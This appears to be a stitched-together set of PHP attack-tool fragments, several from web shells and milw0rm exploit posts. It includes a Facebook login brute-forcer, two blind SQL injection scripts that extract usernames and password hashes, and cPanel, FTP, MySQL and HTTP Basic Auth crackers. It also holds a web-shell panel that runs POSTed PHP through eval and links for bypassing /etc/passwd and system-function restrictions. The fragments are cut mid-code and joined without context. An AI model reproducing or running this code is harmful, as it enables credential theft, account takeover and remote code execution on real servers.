<?php function brute($user, $pass) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}"); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125"); $login = curl_exec($ch); $check = eregi('class="s t i u"', $login) ? true : false; if ($check == true) { echo "No || Username : <font color='red'>{$user}</font> Password : <font color='red'>{$pass}</font></font></p>"; } else { echo "yes || Username: <font color='green'>{$user}</font> Password : <font color='green'>{$pass}</font></font></p>"; } } $username = explode("\n", $_POST['username']); $password = explode("\n", $_POST['password']); foreach ($username as $users) { $users = @trim($users); foreach ($password as $pass) { $pass = @trim($pass); echo brute($users, $pass); } } } else { header("location:../croak"); }
$chr = 0; while ($chr < strlen($key)) { if (check($host, $path, $fld, $pos, $key[$chr])) { $res .= $key[$chr]; $chr = -1; $pos++; } $chr++; } return $res; } function usage() { echo "[+] Lito Lite Blind SQL Injection Exploit\n" . "[+] Author: darkjoker ~ http://darkjokerside.altervista.org ~ darkjoker93[at]gmail[dot]com\n" . "[+] Usage: php " . $argv[0] . " <hostname> <path> [key]\n" . "[+] Ex. php " . $argv[0] . " localhost /lito_lite abcdefghijklmnopqrstuvwxyz0123456789\n" . "[+] Greetz to athos, marco6\n"; exit; } if (count($argv) < 3) { usage(); } $host = $argv[1]; $path = $argv[2]; if (empty($argv[3])) { $key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; } else { $key = $argv[3]; } echo "[+] Username: "******"username", $key) . "\n" . "[+] Password: "******"password", $key) . "\n"; ?> # milw0rm.com [2009-01-03]
} } } if ($cracktype == "cpanel" || $cracktype == "cpanel2") { if ($cracktype == "cpanel2") { $cpanel_port = "23"; } else { $cpanel_port = "2082"; } foreach ($userlist as $user) { $pureuser = trim($user); print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0800\">\r\n Please put some good password to crack user {$pureuser} :( ... </font></b>"; if ($_POST['bruteforce'] == "true") { echo " bruteforcing .."; echo "<br>"; brute(); } else { echo "<br>"; foreach ($passlist as $password) { $purepass = trim($password); cpanel_check($target, $pureuser, $purepass, $connect_timeout); } } } $time_end = getmicrotime(); $time = $time_end - $time_start; print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">\r\n Cracking Finished. Elapsed time: {$time}</font> seconds</b><br><br>"; } } ?>
echo "<option value=\"lib:lib\">lib:lib</option>"; } echo "</select></td></tr>"; echo "<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">"; echo "<OPTION value=\"mysql\">mysql</option>\n <option value=\"ftp\">ftp</option>"; // if(function_exists(ssh2_connect)){ // echo "<option value=\"ssh\">ssh</option>"; // } echo "</select></td>"; echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"" . $host . "\">(for lib:lib)</td></tr>"; if (function_exists(fopen)) { echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"" . $lib . "\">"; } echo "</table></form>"; if ($_POST['b_brute']) { brute($_POST['box'], $_POST['box1'], $_POST['brute_host'], $_POST['lib']); } } #################### Eval ###################################################### if ($r_act == "eval") { if ($_POST['b_eval']) { $eval = str_replace("<?", "", $_POST['php_eval']); $eval = str_replace("?>", "", $eval); eval($eval); } echo "<form action=\"" . $HTTP_REFERER . "\" method=\"POST\" enctype=\"multipart/form-data\">"; echo "<input type=\"hidden\" value='" . $r_act . "' name=\"r_act\">"; echo "<table BORDER=1 align=center>"; echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Eval php: </b></td></tr><font size=-2>"; echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>"; echo "</tr></table></form>";
function authcrackeR() { global $hcwd; if (!empty($_REQUEST['target'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $data = ''; $method = $_REQUEST['method'] ? 'POST' : 'GET'; if (strstr($_REQUEST['target'], '?')) { $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1); $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?')); } $u = parse_url($_REQUEST['target']); $host = $u['host']; $page = $u['path']; $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if ($method == 'GET') { $page .= $data; } echo '<font color=#FA0>'; if ($_REQUEST['mode'] == 'wl') { $dictionary = fopen($_REQUEST['dictionary'], 'r'); while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $so = @fsockopen($host, 80, $en, $es, 5); if (!$so) { echo "Can not connect to host"; break; } else { $packet = "{$method} {$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}"); if ($method == 'POST') { $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data); } $packet .= "\r\n\r\n"; $packet .= $data; fputs($so, $packet); $res = substr(fgets($so), 9, 2); fclose($so); if ($res == '20') { echo "U: {$user} P: {$pass}</br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } } } } } else { $code = ' $so = @fsockopen ( "' . $host . '", 80, $en, $es, 5 ); $packet = "' . $method . " {$page} " . 'HTTP/1.0\\r\\nAccept-Encoding: text\\r\\nHost: ' . $host . '\\r\\nReferer: ' . $host . '\\r\\nConnection: Close\\r\\nAuthorization: Basic " . base64_encode ( "' . $user . ':".$word )."\\r\\n"'; if ($method == "POST") { $code .= ".'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen("'{$data}'") . "'"; } $code .= "\r\n\r\n" . $data . ';fputs ( $so, $packet ); $test= ( substr ( fgets ( $so ), 9, 2 ) == "20");'; echo $code; if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code) != null) { echo "<b>{$user}:{$res}</b><br />"; } } echo 'Done!</font>'; } else { echo ' <form name=cracker method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">HTTP Auth cracker</label> </div><div class="fieldwrapper"> <label class="styled">Target:</label> <div class="thefield"> <input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/admin/" size="30" /> </div> </div> <div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield"> <select name="mode" id="mode" onChange="toggle()"> <option value="09">Bruteforce [0-9]</option> <option value="az">Bruteforce [a-z]</option> <option value="az09">Bruteforce [a-z] [0-9]</option> <option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option> <option value="all">Bruteforce [ALL]</option> <option value="wl">Wordlist</option> </select> </div></div> <div class="fieldwrapper" id="dic"> <label class="styled">Dictionary:</label> <div class="thefield"> <input type="text" name="dictionary" size="30" /> </div> </div><div class="fieldwrapper" id="fcr"> <label class="styled">Dictionary type:</label> <div class="thefield"> <ul style="margin-top:0;"> <li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li> <li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li> </ul> </div> </div> <div class="fieldwrapper"> <label class="styled">Method:</label> <div class="thefield"> <select name="method"><option selected value="1">POST</option><option value="0">GET</option></select> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="user" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label> <div class="thefield"> <input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log"> </div> </div> ' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" name="start" value="Start" style="margin-left: 150px;" /> </div> </form><script>toggle();</script>'; } }
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); curl_setopt($ch, CURLOPT_POSTFIELDS, "user={$user_login}&passi={$pass1}&passii={$pass2}&_wpnonce_create=code=&redirect_to=.{$victim}./author/{$user_login}"); $check = curl_exec($ch); if (eregi('$user_login', $check)) { echo "<p><font face='Verdana' size='1'>[+] Username Has Been Successfully Added : <font color='#008000'>{$user_login} = {$victim}</font></p>"; } else { echo "<font face='Tahoma' size='2' color='red'> => Incorrect Code Trying More...</font><br>"; } } foreach ($user_login as $user) { foreach ($pass1 as $passi) { foreach ($pass2 as $passii) { brute($code); } } } curl_close($ch); } } } } if (isset($_GET['action']) && $_GET['action'] == 'rootshelleexecbpass') { echo '<center><b class="conte"> <a href="?action=grasy">Bypass /etc/passwd</a> - <a href="?action=nemcon">Bypass Users Server</a> - <a href="?action=cgipl">Bypass Perl Security</a> - <a href="?action=bypsrootwzp">Bypass With Zip File</a> - <a href="?action=bforb">Bypass system function</a> -
} else { $ARG = array(); foreach ($argv as $arg) { if (strpos($arg, '-') === 0) { $key = substr($arg, 1, 1); if (!isset($ARG[$key])) { $ARG[$key] = substr($arg, 3, strlen($arg)); } } } if ($ARG[s] && $ARG[u]) { $server = $ARG[s]; $User_id = intval($ARG[u]); $User_id--; print "[+] Phase 1 brute login.\n"; $login = brute($User_id, "Login"); print "\n[+] Phase 1 successfully finished: {$login}\n"; print "[+] Phase 2 brute password-hash.\n"; $hash = brute($User_id, "Password"); print "\n[+] Phase 2 successfully finished: {$hash}\n"; successfully($login, $hash); } else { help_argc($argv[0]); exit(0); } } ?> # milw0rm.com [2008-12-23]